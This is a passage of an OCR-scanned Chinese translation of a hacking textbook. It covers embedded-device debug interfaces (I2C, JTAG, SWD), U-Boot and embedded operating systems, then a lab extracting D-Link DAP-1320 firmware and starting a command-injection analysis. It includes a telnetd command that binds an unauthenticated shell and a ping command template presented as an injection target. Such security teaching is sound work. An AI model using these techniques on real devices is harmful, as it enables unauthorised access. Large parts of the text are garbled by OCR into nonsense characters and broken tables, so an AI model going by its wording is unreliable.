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PC 是 一 种 多 主 、 多 从 、 分 组 的 串 行 通信 协议 。 它 比 SPI 慢 ， 只 使 用 两 个 而 非 三 
个 引 脚 ， 外 加 每 个 从 设备 的 CS。 与 SPI 类 似 ，PC 用 于 电路 板 上 IC 则 的 短程 通信 ， 但 
也 可 用 于 布线 。 与 SPI 不 同 ， 了 PC 是 正式 规范 。 

虽然 支持 多 个 主 设备 ， 但 PC 相互 之 间 不 通信 ， 不 能 同时 使 用 总 线 。 主 设备 使 用 
地 址 包 后 接 一 个 或 多 个 数据 包 的 形式 与 特定 设备 通信 。 两 个 引 脚 如 下 所 示 : 

e SCL(Serial Clock， 串 行 时 钟 ) 

e SDA(Serial Data， 串 行 数 据 ) 

从 图 23-5 可 以 看 到 ，SDA 引 脚 是 双 同 的 ， 由 所 有 设备 共享 。 男 外 ，SCL3 引 脚 由 
己 经 连接 数据 总 线 的 主 设备 驱动 。 


SCL I2C 
SDA 从 设备 1 


SCL DC 
SDA 从 设备 2 


SPI SCL | SCL I2C 


主 设备 2 SDAL | l ,sDA 从 设备 3 


图 23-5 ”两 主 三 从 示例 配置 


E5 SPIK W, PCH A+ 5E EEPROM 1E NVRAM(NonVolatile Random Access 
Memory, JE% REBELY In Aig as IE. IE Bus Pirate R, RENA, 
进行 离线 分 析 或 写 入 数据 。 


23.3 调试 接口 


在 运行 Windows 或 Linux 操 作 系 统 的 计算 机 上 ， 调 试 应 用 程序 是 一 件 简 单 的 事 
情 ， 只 需要 将 进程 与 软件 调试 右 天 联 即 可 。 而 在 租 入 式 系 统 中 进行 调试 时 会 过 到 很 
多 障碍 ， 调 试 过 程 较 难 完成 。 例 如 ， 如 果 未 安 准 操作 系统 或 未 引导 操作 系统 ， 如 何 
WR SUR AE? 现代 嵌入 式 系统 的 高 度 集成 的 电路 板 上 有 许多 复杂 的 IC， 几 乎 不 
能 访问 心 上 请 上 的 引 脚 。 令 开 肥 人员 和 测试 人 员 感 到 欣 感 的 是 ， 人 硬件 制造 行业 已 经 开 
发 出 访问 IC 内 部 的 方法 ， 以 便 执行 测试 和 调试 、 编 写 非 易 失 性 存储 器 上 的 固件 ， 以 
及 完成 其 他 任务 。 


23.3.1 JTAG 


JTAG(oint Test Action Group， 联 合 测 试行 动 小 组 ) 创 建 于 20 世 纪 80 年 代 ， 是 一 
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种 用 于 帮助 调试 和 测试 IC 的 方法 。 在 1990 年 ， 该 方法 成 为 IEEE 1149.1 标 准 ， 但 通常 
将 其 简称 为 JIAG。 虽 然 它 最 初 是 为 了 帮助 进行 电路 板 级 测试 ， 但 实际 上 ， 也 可 用 于 
硬件 级 别 的 调试 。 

简单 而 言 ，JIAG 定 义 了 一 种 机 制 ， 通 过 标准 化 状态 机 ， 使 用 几 个 外 部 可 访问 的 
信号 访问 IC 内 部 。 这 是 一 个 标准 机 制 ， 但 背后 的 实际 功能 是 IC 专 用 的 。 这 意味 着 ， 
只 有 了 解 正在 调试 的 IC， 才 能 高 效 地 使 用 JIAG。 例 如 ， 分 别 给 ARM 人 处 理 右 和 MIPS 
处 理 堪 上 友 送 一 个 比特 序列 , 处 理 需 将 根据 内 部 逻辑 对 这 个 比特 序列 给 出 不 同 的 解释 。 
OpenOCD 之 类 的 工具 要 求 有 设备 专用 配置 文件 才能 正常 运行 。 表 23-2 给 出 了 4/5 
JIAG 引 脚 的 描述 信息 ， 不 过 ， 制 造 商 可 定义 更 多 引 脚 。 引 脚 的 集合 也 称 为 TAP(Test 
Access Port, WINAY In] 9m E1)« 


323-2 4/5 JTAG 引 脚 的 描述 信息 


引 脚 摘 述 信息 
TCK(Test Clock) TCK 引 脚 用 于 给 目标 的 TDI 和 TMS 输 入 提供 时 钟 信 号 。 时 钟 用 于 调 


试 絮 和 准备 同步 的 设备 
TMS(Test Mode Select) TMS5| Hal T Vx EL H bs ETAPAS HER HY AAS 


TDI(Test Data In) TDI 引 脚 在 调试 期 间 给 目标 提供 串 行 数据 
TDOCTest Data Out) TDO 引 脚 在 调试 期 间 从 目标 接收 串 行 数据 
TRST(Test Reset) (可 选 )RST 引 脚 可 用 于 重 置 处 理 占 的 TAP 控 制 占 , 从 而 允许 执行 调试 


或 许 你 认为 表 23-2 中 的 五 个 引 脚 具 有 标准 布局 ， 但 实际 上 ， 电 路 板 和 IC 制造 商 
定义 了 各 目的 布局 。 表 23-3 定 义 了 一 些 弟 用 的 引 脚 布局 ， 其 中 包括 10 引 脚 、14 引 脚 
和 20 引 脚 配置 。 表 23-3 中 的 引 脚 布 局 只 是 示例 ， 在 调试 器 中 使 用 前 需要 进行 验证 。 


表 23-3 ”典型 的 JTAG5 引 脚 布局 


引 脚 145| 脚 ARM 205| 脚 ARM TI MSP430 MIPS EJTAG 
GND 


| 

2 

3 

4 | 
; Io 
6 ' "CLE | 
7 

8 

9 
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(AER) 


5 | Ral 145| 脚 ARM 205| 脚 ARM TI MSP430 MIPS EJTAG 


o | ew ep GND 
11 RTCK nSRST nSRST 
12 nSRST — 


2 


14 GND 
T ERN 


JF AA CRI TA AN, oa 388 as [88 H1 E P Be 
调试 时 停止 处 理 器 

读 写 内 部 程序 存储 (当代 人 码 存 储 在 微 控制 器 中 时 ) 
该 与 内 存 (固件 修改 或 提取 ) 

恋 写 内 存 

e ”修改 程序 流 ， 绕 过 功能 ， 以 获得 受 限 的 访问 权 

可 以 看 到 ，JTIAG 接 口 的 功能 十 分 强大 。 设 备 制造 商 陷 入 左右 为 难 的 境地 。 要 在 
舱 入 式 系 统 的 整个 生命 周期 中 进行 开发 、 测 试 和 调试 ，JTIAG 并 口 不 可 或 缺 。 但 电路 
板 上 JTAG 闹 口 的 存在 为 研究 人 员 和 攻击 者 提供 了 发 现 秘密 、 更 改行 为 和 查找 汤 润 的 
能 力 。 通 第 ， 制 造 商 通过 切断 线路 、 不 填充 引 肢 、 不 给 引 肢 添加 标签 或 借助 蕊 片 功 

能 实现 禁用 等 方式 , 力求 提升 在 生产 环境 中 使 用 JTAG 接 口 的 难度 。 Harika 
施 起 到 一 定 效 果 ， 但 意志 坚强 的 攻击 者 可 通过 多 种 方式 绕 过 防线 ， 这 些 方法 包括 修 
复 断 开 的 走 线 、 在 电路 板 上 焊接 引 脚 ， 甚至 将 IC 送 到 专门 提取 数据 的 公司 等 。 

有 些 人 忽略 JIAG 的 弱点 ， 他 们 认为 ， 只 有 通过 物理 方式 (可 能 是 破坏 性 方式 ) 才 
能 使 用 JIAG， 因 此 这 个 弱点 不 足 为 患 。 这 种 观点 是 错误 的 。 实 际 上 ， 攻 击 者 可 以 使 
用 JTIAG 了 解 到 有 关系 统 的 大 量 信 息 。 如果 系 统 上 存在 一 些 诸如 密码 、 内 部 文 持 后 门 、 
密 钥 或 证 书 之 类 的 全 局 秘密 ， 这 些 信息 可 能 被 提取 ， 并 可 用 于 攻击 远程 系统 。 


23.3.2 SWD 


SWD(Serial Wire Debug， 串 行 线 调试 ) 是 一 个 ARM 专 用 的 调试 和 编程 协议 。 与 
较 第 见 的 五 引 脚 JIAG 不 同 ，SWD 使 用 两 个 引 脚 。SWD 提 供 时 钟 (SWDCLKE) 和 双 癌 
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数据 线 (SWDIO) 来 实现 JIAG 的 调试 功能 。 如 表 23-4 所 示 ，SWD 和 JIAG 可 以 共存 ， 


表 23-4  BBZUBUJTAG/SWDS BRE fa 
引 脚 10 引 脚 ARM Cortex SWD 和 JTAG 20 引 脚 ARM SWD 和 JTAG 
VRef 


ET 
uc 
GND 
IMSSWDIO 
GND 


-— 
= 
| 


‘Om || | 
Alo 2 "| 

| 号 | S 

z 


i [pe 
| ee 
S [ [baa 


开发 人 员 和 测试 人 员 使 用 SWD 的 能 力 与 使 用 JTIAG 是 一 样 。 这 些 能 力 既 能 
制造 者 ， 也 能 使 攻击 者 有 友 现 漏洞 。 


234 软件 


只 有 定义 了 功能 后 ， 迄 今 为 止 讨论 的 所 有 便 件 才能 友 挥 作用 。 在 基于 向 控制 项 / 
微 处 理 需 的 系统 中 ， 软 件 定 义 芒 能 ， 便 系统 焕 有 生机。 局 动 加 载 程序 (bootloaden 用 
于 初始 化 处 理事 并 局 动 系统 软件 。 系 统 软件 可 分 为 以 下 三 种 。 

e 无 操作 系统 : 用 于 简单 系统 。 


un 
CC 
Jë 
TE 
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。 实时 操作 系统 : 适用 于 对 处 理 时间 具 有 严格 要 求 的 系统 (例如 ，VxWorks 和 
Nucleus). 

e 通用 操作 系统: 适用 于 对 处 理 时 间 没 有 严格 要 求 , 但 功能 要 求 较 多 的 系统 (如 
Linux All ik ^ 3X Windows 78355). 


23.4.1 ”局 动 加 载 程 序 


要 在 处 理 器 上 运行 较 高 级 的 软件 ， 必 须 对 系统 进行 初始 化 。 执 行 处 理 器 和 所 需 
初始 外 围 设 备 的 初始 配置 的 程序 被 称 为 启动 加 载 程 序 。 这 个 过 程 通常 需要 经 历 多 个 
步骤 ， 才 能 使 系统 做 好 运行 高 级 软件 的 准备 。 

(1) 微 处 理 占 / 微 控 制 占 处 于 局 动 模式 ， 从 非 处 理 器 设备 的 菜 个 固定 位 置 加 载 一 
个 小 程序 。 

(2) 这 个 小 程序 初始 化 RAM 和 所 需 的 结构 ， 将 启动 加 载 程 序 的 其 余部 分 加 载 到 
RAM 中 (例如 U-Boot)。 

(3) 启动 加 载 程序 初始 化 所 需 的 任何 设备 ， 局 动 主 程 序 或 操作 系统 ， 加 载 主 程 
序 ， 并 将 执行 权 转 移 给 新 加 载 的 程序 。 对 于 Linux 而 言 ， 主 程序 是 内 核 。 

如 果 使 用 的 是 U-Boot， 那 么 这 个 启动 加 载 程序 配置 了 加 载 主 程序 的 可 选 方式 。 
例如 , U-Boot 能 从 SD 卡 、NAND 内 存 .NOR 闪 存 、USB、 串 行 接 口 或 网 络 上 的 TFTP( 如 
果 已 经 初始 化 网 络 的 话 ) 加 载 。 除 了 加 载 主 程序 外 ， 启 动 加 载 程序 还 可 用 于 蔡 代 持久 
存储 设备 中 的 主 程序 。 前 面 JIAGulator 示 例 中 的 Ubiquitt ER-X 使 用 的 是 U-Boot( 见 图 
23-6)。 除 了 加 载 内 核 外 ， 启 动 加 载 程序 还 允许 读 写 内 存 和 存储 峰 。 


9: Load Boot Loader code then write to Flash via TFTP. 
default: 


= Ee Lad [AJ 
d oe os 


You choosed 4 


4: System Enter Boot Command Line Interface. 


U-Boot 1.1.3 (Nov 2 2015 - 16:39:31) 
MT7621 # help 
- alias for 'help' 


bootm 一 boot application image from memory 

C - memory copy 

erase - erase SPI FLASH memo 

go - start application at address 'addr' 

help - print online help 

i2ccmd - read/write data to eeprom via I2C Interface 
loadb 一 load binary file over serial line (kermit mode) 


- memory display 
mdio  - Ralink PHY register R/W command !! 
mm - memory modify (auto-incrementing) 
nand - nand command 
nm - memory modify (constant address) 
printenv- print environment variables 
reset — - Perform RESET of the CPU 
saveenv 一 save environment variables to persistent storage 
setenv - set environment variables 
sp 一 spi command 
tftpboot- boot image via network using TFTP pratocol 
ubntw - ubntw command 
version = print monitor version 
MT7621 & ll 


123-6 Ubiquiti ER-XÉJU-Boot 
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2342 无 操作 系统 


对 很 多 应 用 程序 而 言 ， 系 统 很 简单 ， 考 虑 到 操作 系统 开 铺 较 大 ， 所 以 不 值得 使 
用 ， 或 不 允许 使 用 。 例 如 ， 用 于 执行 测量 并 将 测量 值 肥 送 给 忆 一 个 设备 的 传 感 硕 可 
能 使 用 PIC 这 种 低 切 耗 微 处 理 南 ， 几 乎 没有 使 用 操作 系统 的 必要 性 。 在 本 例 中 ，PIC 
PRERA AES HY UE URCUU ite. RAMSEJSÍI —TERTE IRA 

在 没有 操作 系统 的 系统 中 ， 将 基于 地 址 偶 移 或 使 用 NVRAM， 以 十 分 简陋 的 方 
了 存储 数 据 。 夯 外 ， 和 它们 通 第 没有 用 尸 夫 面 ， 或 界面 十 分 简单 (如 LED 或 按钮 )。 获 
取 程 序 后 ， 要 么 从 存储 上 融 提 取 ， 要 么 进行 下 载 ， 格式 可 能 完全 是 目 定 义 的， 第 用 的 
文件 分 析 工 具 很 难 识别 。 最 明智 的 做 法 是 阅读 微 控 制 右 的 文档 ， 理 解 设备 如 何 加 载 
代码 ， 并 和 芝 试 使 用 反 汇 编 厚 手动 反 编 诺 代 码 。 

你 或 许 认 为 ， 如 此 简单 的 系统 肯定 不 会 引起 黑客 的 兴趣 ; 但 要 记 住 ， 它 们 可 能 
通过 互联 网 连接 到 更 复杂 的 系统 。 不 要 因为 这 些 设备 不 存在 有 价值 的 攻击 面 ， 驶 到 
目 低 信和 这 些 设 备 的 价值 ， 要 考虑 它们 的 整体 使 用 场景 ， 例 如 与 它们 连接 的 设备 以 及 
它们 的 使 用 目的 。 受 限 的 指令 空间 可 能 意味 厦 设 备 无 力 防 范 恶 意 输入 ， 而 且 使 用 的 
协议 很 可 能 未 加 密 。 夯 外 ， 已 连接 的 系统 可 能 完全 信任 来 目 这 些 设备 的 数据 ， 并 未 
采用 适当 指 施 以 确保 数据 是 有 效 的 。 


2343 ”实时 操作 系统 


对 处 理 时 间 有 人 硬性 要 求 的 更 复杂 系统 通 币 使 用 RIOSGReal-Time Operating 
System， 实 时 操作 系统 )， 如 VxWorks。RIOS 的 优势 在 于 提供 了 操作 系统 功能 ， 如 
任务 、 队 列 、 网 络 堆栈 、 文 件 系统 、 中 断 处 理 程序 、 设 备 赎 理 等 ， 还 添加 了 确定 性 
调度 器 功能 。 例 如 ， 目 主 轨 驶 或 要 驶 员 辅 助 的 汽车 系统 可 能 使 用 RIOS， 确 保 在 系统 
允许 的 安全 程度 以 内 (这 是 价 性 规定 ) 对 各 种 传 感 颖 做 出 啊 应 。 

如 果 习 惯 使 用 Linux 系 统 ， 会 发 现 VxWorks 大 不 相同 。Linux 具 有 十 分 标准 的 文 
件 系 统 ， 第 用 的 程序 有 telnet、busybox、fitp 和 sh 等 ， 应 用 程序 作为 单独 的 进程 在 操 
作 系 统 上 运行 。 而 在 VxWorks 中 ， 很 多 系统 实际 上 是 为 多 个 任务 运行 单个 进程 ， 没 
有 标准 文件 系统 或 辅助 应 用 程序 。Linux 包 含 提取 固件 和 逆 辐 工程 的 大 量 信息 ， 而 
VxWorks 几乎 不 包含 这 些 信 息 。 

通过 SPI 或 FTC 提取 固件 ， 或 使 用 下 载 的 文件 ， 你 将 获得 可 进行 反 汇 编 的 字符 串 
和 代码 。 但 与 Linux 不 同 ， 通 稍 不 会 获得 易于 理解 的 数据 。 分 析 字 符 串 ， 友 现 密 但 、 
证 书 、 密 钥 和 格式 字符 串 ， 可 获得 有 用 的 秘密 信息 ， 用 于 攻击 正在 使 用 的 系统 。 男 
外 ,使 用 JIAG 设 置 断 点 以 及 在 设备 上 执行 操作 , 是 对 该 功能 进行 赣 回 工程 的 最 有 效 
AE. 
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23.44 通用 操作 系统 


术语 “通用 操作 系统 ”用 于 描述 非 RTOS 操 作 系 统 。Linux 是 通用 操作 系统 最 常 
见 的 示例 。 用 于 葡 入 式 系统 的 Linux 与 用 于 有 果 面 系统 的 Linux 区 别 不 大 。 文 件 系 统 和 
体系 结构 是 一 样 的 ， 主 要 区 别 在 于 外 围 设 备 、 存 储 和 内 存 限制 |。 

由 于 存储 器 和 内 存 较 小 ， 因 此 操作 系统 和 文件 系统 也 都 尽量 压缩 。 例 如 ， 不 使 
用 安装 在 Linux 中 的 常见 程序 (如 bash、telnetd、ls 和 cp 等 )， 而 通常 使 用 更 小 的 一 体 化 
程序 busybox。busybox 将 第 一 个 参数 用 作 上 所 需 的 程序 ， 在 单个 可 执行 程序 中 提供 所 
需 的 功能 。 或 许 会 说 ， 删 除 这 些 未 用 的 服务 是 为 了 缩小 攻击 面 ， 但 实际 上 ， 很 可 能 
只 是 为 了 节省 空间 。 

虽然 大 多 数 设备 不 专门 为 用 户 提供 控制 台 访 问 界 面 , 但 许多 设备 都 有 一 个 串口 ， 
以 便 在 电路 板 上 进行 控制 台 访 问 。 只 要 能 通过 控制 台 或 从 存储 中 提取 镜像 访问 根 文 
件 系 统 ， 就 可 以 查找 应 用 程序 和 库 的 版 本 ， 全 局 可 写 目 录 、 任 何 持 久 存 储 以 及 初始 
化 进程 。Linux 的 初始 化 进程 位 于 /etc/inittab 和 /etc/init.d/reS， 可 从 中 了 解 应 用 程序 的 
局 动 方式 。 


235 Rea 


本 章 简 要 介绍 了 了 不同 CPU 封 效 ( 微 控制 器 、 微 处 理 器 和 SoO) 之 间 的 区 别 , 分 析 了 
几 个 我 们 感 兴趣 的 串 行 接 口 JIAG 和 骨 入 式 软 件 , 讨 论 串 行 接 口 时 ,在 发 现 UART( 串 
行 ) 端 口 的 例子 中 介绍 了 JIAGulator。JIAGulator 可 用 于 发 现 JIAG 调 试 端 口 以 及 其 他 
一 些 接 口 。 本 章 还 人 简要 讨论 几 个 不 同 的 软件 用 例 ， 包括 局 动 加 载 程 序 、 无 操作 系统 、 
RTOS 和 通用 操作 系统 。 此 时 , 你 应 当 已 经 基本 了 解 租 入 式 系统 的 词汇 以 及 一 些 相关 
领域 ， 可 在 此 基础 上 继续 探索 和 研究 。 
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本 章 讲 述 如 何 攻 击 藤 入 式 设 备 。 如 前 几 间 所 述 ， 随 看 物 联网 的 兴起 ， 这 个 问题 
下 变 得 越 来 越 匣 要 。 从 电梯 、 汽 车 到 烤 面 包机 ， 所 有 物品 都 趋 回 智能 化 ， 骨 入 式 设 
备 变 得 无 处 不 在 ， 安 全 汤 洞 和 威胁 数不胜数 。 正 如 Bruce Schneier 所 言 ， 现 在 就 像 20 
世纪 90 年 代 的 美国 电影 《西部 狂 野 》 中 的 情景 。 放 了 眼 望 去 ， 这 些 舱 入 式 设 备 的 漏洞 
随处 可 见 。Schneier 解 释 道 ， 这 归 符 于 很 多 因 系 ,包括 设备 本 里 的 资源 有 限 ， 骨 入 式 


设备 制造 利润 微薄 ， 从 而 导致 制造 两 的 资源 也 有 限 。 但 愿 有 更 多 的 道德 黑客 可 以 直 
面 这 个 挑战 ， 在 艇 入 式 设 备 漏洞 大 潮 中 力挽狂澜 。 
ARS ARAL: 


e BATU EAE TT BAS OMT 
o 使 用 硬件 执行 动态 分 析 
e EF RR ae PUT AS TT 


24.1 WARA NA FR BS 934 TAPS 27 TIT 


对 漏洞 进行 静态 分 析 时 ， 可 以 通过 检测 更 新 包 、 文 件 系统 和 系统 二 进 制 文件 查 
找 漏洞 ， 而 不 必 给 要 评测 的 设备 加 电 。 事 实 上 ， 很 多 情况 下 ， 攻 击 者 不 需要 设备 就 
可 以 完成 大 多 数 静态 分 析 工 作 。 在 本 节 中 ， 我 们 将 使 用 一 些 工具 和 技术 ， 在 嵌入 式 
设备 上 执行 静态 分 析 。 


24.1.1 实验 24-1: 分 析 更 新 包 


大 多 数 情况 下 ， 可 从 供应 商 站 点 下 载 设 备 的 更 新 包 。 有 目前 ， 大 多 数 更 新 都 不 加 
密 ， 可 使 用 各 种 工具 (如 unzip、binwalkk 和 Firmware Mod Kib 进 行 分 析 。 为 便于 读 示 ， 
ix HUREA TZ A VK] ST Linux RATA ZS. 

在 基于 Linux 的 能 入 式 系 统 中 , 更 新 包 通 第 包 舍 运行 系统 需要 的 所 有 重要 文件 和 
目录 的 新 副本 。 所 需 的 目录 和 文件 称 为 根 文件 系统 (Root File System, RFS). WR 
攻击 者 获得 对 RFS 的 访问 权 , 那么 他 们 将 获得 初始 化 的 例 程 、Web 服 务 磺 资源 代码 、 
运行 系统 需要 的 二 进 制 文件 ， 以 及 为 攻击 者 攻击 系统 提供 方便 的 工具 。 例 如 ， 如 
果 系 统 使 用 busybox 并 包含 telnetd 服 务 器 , 攻击 者 将 能 利用 Telnet 服 务 器 远程 访问 系 
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统 。 傅 切 地 讲 ，busybox 中 的 telnetd 服 务 右 提供 了 一 个 参数 ， 人 允许 攻击 者 不 经 里 份 
认证 即 可 对 其 进行 调用 ,并 可 把 telnetd 服 务 器 与 任何 程序 (/usr/sbin/telnetd —1 /bin/sh) 
作为 示例 ， 我 们 将 研究 较 旧 版 本 的 D-Link DAP-1320 无 线 中 继 器 的 固件 更 新 ( 硬 
件 的 1.1 版 本 )。 之 所 以 选择 这 个 更 新 ， 是 因为 它 比 较 旧 ， 已 被 打上 补丁 ， 而 且 已 经 
由 几 位 作者 公开 了 漏洞 (www.kb.cert.org/vuls/id/184100)， 如 图 24-1 所 示 。 


(oe € [T] E support.diink. Son He: aspx?m-DAP-1320 


Security Advisories Shop 


L4 ; 
TechSupport 
Building Networks for People 
| Consumer | Business 
Product Registration Warranty Document DAP-1320 
— Register your product to extend ycur Click here to see this product's Wireless Range Extender 
TE free support from 30 days to 90 days warranty document. 
= 
First Time Setting Up? Contact Support ELM 
Check out our FAQs, Videos and Quick This product has been discontinued. 本 
Install Guides Free support for this product will enc 
on UA aH 20185 : 


For access to tha right downloads, please select the correct hardware revision for your device. 


A - How to find the hardware version? 


Firmware (1.11) | 09/26/13 | 1 Release Notes 


图 24-1 D-Link DAP-1320 无 线 T 


APTENT 境 E Ms Kit。 人 


spt act 预先 安装 一 些 软件 @， 安装 好 软件 后 ，} 只 需要 从 GitHub 高 降 项 目 即 可 完成 
装 @。 第 一 次 运行 extract-firmware.sh 时 ， 它 会 编译 所 需 的 工具 ， 并 生成 大 量 输出 (本 
例 不 介绍 第 一 次 运行 )。 此 后 尝试 对 固件 解压 合 ， 如 果 工 具 知 道 包 和 内 容 的 类 型 ,将 
提取 它们 并 进行 进一步 分 析 。 在 输出 中 可 以 看 到 ， 工 具 已 经 找到 MIPS Linux 内 核 镜 
像 @ 和 squashfs 文 件 系 统合 , 并 将 它们 成 功 地 提取 到 fmk 目 录 . 通过 浏览 这 些 内 容 ， 
可 确定 它 是 rootfs，@ 并 确认 己 经 编译 成 MIPS 的 二 进 制 文件 全 。 


Oroot@kali:~/DAP-1320# apt-get install git build-essential 
zliblg-dev \ 

> liblzma-dev python-magic 

<truncated for brevity> 

After this operation, 111 MB of additional disk space will be used. 
Do you want to continue? [Y/n] y 

<truncated for brevity> 

@root@kali:~/DAP-1320# git clone 
https://github.com/rampageX/firmware-mod-kit.git 

«truncated for brevity> 
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root@kali:~/DAP-1320# export 

PATH=S PATH: /root/DAP-1320/firmware-mod-kit 

@root@kali:~/DAP-1320# extract-firmware.sh DAP1320 fw 1 11b10.bin 
Firmware Mod Kit (extract) 0.99, (c)2011-2013 Craig Heffner, Jeremy 


Collake 
Scanning firmware... 
Scan Time: ZBUTI-12-U5 17:10:39 


Target File: /root/DAP-1320/DAP1320 fw 1 11b10.bin 
MDS Checksum:  3d13558425d1147654e8801a99605ce6 


Signatures: 344 
DECIMAT, HEXADECIMAL DESCRIPTION 
Ü 0x0 ulmage header, header size: 64 bytes, 


header CRC:0x71C7BA94, created: 2013-09-16 08:50:53, image size: 
799894 bytes, Data Address:0x80002000, Entry Point: Ox801AB9F0, data 
CRC: 0xA62B902, QOS: Linux, CPU: MIPS, image type: OS Kernel Image, 
compression type: lzma, image name: "Linux Kernel Image" 

64 0x40 LZMA compressed data, properties: Ox5D, 
dictionary size: 8388608 bytes, uncompressed size: 2303956 bytes 
851968 OxDO000 @Ssquashfs filesystem, little endian, 
version 4.0, compression:lzma, size: 2774325 bytes, 589 inodes, 
blocksize: 65536 bytes, created: 2013-09-16 08:51:15 


Extracting 851968 bytes of uimage header image at offset 0 
Extracting squashfs file system at offset 851968 
Extracting 544 byte footer from offset 5438942 

Extracting squashfs files... 

Firmware extraction successful! 

@Firmware parts can be found in '/root/DAP-1320/fmk/*' 
root@kali:~/DAP-1320# ls fmk 

image parts logs rootfs 

@root@kali:~/DAP-1320# 1s fmk/rootfs 

bin dev etc lib linuxrc proc sbin share sys tmp usr var www 
root@kali:~/DAP-1320 4 1s fmk/rootfs/bin 


ash cit ethreg in mount ps touch 

busybox en fgrep login mv rm udhcpc 
busybox 161 date gpio event ls netbios checker sed umount 
cat dd grep md nvram sh uname 

cgi echo hostname mkdir ping sleep  xmlwf 

chmod egrep kill mm pingó SS1 


@root@kali:~/DAP-1320 # file fmk/rootfs/bin/busybox 

busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), 

dynamically linked, interpreter /lib/ld-uClibc.so.0, corrupted 

section header size 

现在 提取 更 新 包 ,， 我 们 可 以 浏览 文件 ,但 找 系 统 功 能 、 配 置 或 未 知 的 应 用 程序 。 
表 24-1 定 义 了 一 些 在 浏览 时 要 得 找 的 项 目 。 
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表 24-1 检查 文件 系统 


目的 bash 命 令 示例 

找到 可 执行 文件 (注意 ， 非 busybox 文 件 ) find . -type f -perm /u+x 

确定 目录 结构 以 供 未 来 分 析 find . -type d 

查找 Web 服 务 器 或 相关 的 技术 find. -type f -perm /u*x -name "*httpd*" -o 
-name "*cgi*" -o -name "*nginx*" 

查找 库 版 本 for i in ‘find . -type d -name lib';do find $i -type 
Edone 

查找 HTML、JavaScript、CGI 和 配置 文件 find. -name "*.htm*" -o -name "* js" -o -name 


"* cgi" -0 -name "*.conf" 


查找 可 执行 版 本 (例如 ， 使 用 lighttpd) strings sbin/lighttpd | grep lighttpd 


注意 : 任何 可 执行 文件 或 库 的 版 本 都 需要 与 已 知 漏洞 进行 交叉 检查 。 例 如 ， 


使 用 Goo gle 搜 索 <name><version number>vulnerability. 


一 旦 收集 到 所 有 这 些 信息 ， 束 需要 了 解 如 何 处 理 来 目 浏 览 占 或 运行 中 服务 的 
请 求 。 由 于 己 经 完成 了 上 述 所 有 步骤 ， 因 此 这 里 缩减 了 下 面 的 示例 ， 以 简化 分 析 。 
BA AHL WebJl 25 48 elighttpd@, "c [ii Hilighttpd*.conf @#llmodules.conf 合作 为 配 
置 文件 。 另 外， 还 使 用 cgi.conf O, 将 几乎 所 有 处 理 都 指向 /bin/ssi 全 (一 个 二 进 制 可 
执行 文件 )。 


root@kali:~/DAP-1320/fmk/rootfs# find . -type f -perm /u+x -name 
"*httpd*" -o -name "*pgr*" -o -name "“*nginx*" 


<truncated for brevity> 

Q ./sbin/lighttpd 
./sbin/lighttpd-angel 
./etc/conf.d/cqi.conf 
./bin/cai 
root@kali:~/DAP-1320/fmk/rootfs# find . -name *.conf 
O./etc/lighttpd.conf 
./etc/conf.d/mime.conf 
./etc/conf.d/cgi.conf 
./etc/conf.d/auth base.conf 
./etc/conf.d/expire.conf 
./etc/conf.d/auth.conf 
./etc/conf.d/dirlisting.conf 
./etc/conf.d/graph auth.conf 
./etc/conf.d/access log.conf 
./etc/modules.conf 
./etc/host.conf 
./etc/resolv.conf 
O./etc/lighttpd base.conf 
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root@kali:~/DAP-1320/fmk/rootfs# cat etc/lighttpd base.conf 

TE EE E AE AE HE T E T T FE AE HE FE FE FE AE AE FE TE HE E AE FE AE FE TE E FE TE HE FE AE EE HE FE FEAE AE TE HE FE TE E FE AE E EE AE AE E E E HE E E E E 
## /etc/lighttpd/lighttpd.conf 

14 check /etc/lighttpd/conf.d/*.conf for the configuration of modules. 
FE TE AE FE FE TE AE FE FE TE TE AE E FE TE AE HE E TE TE AE FE TE TE AE AE FE TE AE HE TE TE TE AE E TE TE AE HE TE TE E FE TE TE TE AE FE TE TE E FE FE TE H FE FE TE E E E E E E E 
<truncated> 

## Load the modules. 

include "modules.conf" 

«truncated» 

root@kali:~/DAP-1320/fmk/rootfs# cat etc/modules.conf 

T E FE TE TE FE HE E IE FE TE E FE TE PE FE FE E FE FE E FE FE TE HE FE TE HE FE AE TEE IEEE E TE HE FE E IEEE EE EE EE EE a EE E 
## Modules to load 

<truncated> 

@include "conf.d/cgi.conf" 

root@kali:~/DAP-1320/fmk/rootfs# cat etc/conf.d/cgi.conf 

FE TE AE FEAE EE EE E AE AE E FE EE FE AE AE FE AE AE FE AE AE FE AE HE E AE E AE FE AE EEEEE EE EE EE FE AE AE FE AE EE E E E E E E 
## CGI modules 

EI Ub 

## http://www.lighttpd.net/documentation/cgi.html 

T4 


server.modules += ( "mod cgi" ) 


## Plain old CGI handling 
## For PHP don't forget to set cgi.fix pathinfo = 1 in the php.ini. 


+t 
cgi.assign = | 
© " htg" => Pi ie Se. 
"public.js" => "/bin/ssi", 
" aml" => "lbin/agsr" 
"save configure.cgi" => "/bin/sh", 


"hnap.cgi" => "/bin/sh", 
"LrübS.ogri" => "lbinysh", 
"widget.cgi" => "/bin/sh", 
"ogi" => “hinasi”; 
sS htmi" => "/bin/ssi", 
"xt" => "/bin/ssi" 
) 


此 时 ， 我 们 已 经 知道 如 何 继续 ， 并 开始 分 析 漏 洞 。 
24.1.2 ”实验 24-2: 执行 漏洞 分 析 

这 里 的 漏洞 分 析 与 前 几 章 讲述 的 方法 区 别 不 大 。 可 以 搜索 命令 注入 、 格 式 化 字 
IFE, SAX. FEMUR ELA. FRAC RU RE Sill. HORE APE Ti 
制 文 件 中 查找 命令 注入 类 型 漏洞 的 技术 。 由 于 /bin/ssi 是 二 进 制 ,我 们 将 对 使 用 %s( 代 
表 字 符 串 ) 的 格式 化 字符 串 进行 查找 , 然后 将 输出 重 定 向 到 /dev/null( 意 味 着 我 们 不 关 
心 输出 )。 这 种 模式 很 有 趣 ， 因 为 它 可 能 表明 一 个 sprintf 函 数 正在 创建 一 个 命令 ， 该 
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命令 具有 一 个 可 能 由 用 户 控制 的 变量 ， 可 以 与 popen 或 system 一 起 使 用 。 例 如 ， 可 按 
如 下 方式 创建 一 个 命令 ， 玛 看 万 一 台 主 机 古 侣 处 于 活动 状态 : 


sprintf (cmd, "ping -q -c 1 $s > /dev/null",variable) 


如 果 攻 击 者 控制 了 这 个 变量 ， 而 这 个 变量 未 经 清理 ， 并 且 命令 在 shell 中 执行 ， 
则 攻击 者 可 以 将 他 们 的 命令 注入 预期 的 命令 中 。 这 里 有 两 个 有 趣 的 字符 串 ， 近 示 好 
像 正 在 下 载 一 个 文件 : 

